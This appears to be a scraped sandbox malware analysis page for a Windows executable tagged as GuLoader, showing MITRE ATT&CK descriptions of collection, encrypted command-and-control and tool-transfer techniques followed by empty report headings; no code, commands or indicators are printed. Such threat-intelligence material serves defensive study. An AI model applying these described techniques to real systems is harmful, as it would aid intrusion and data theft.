Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report KHAWATMI CO.IMPORT & EXPORT.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics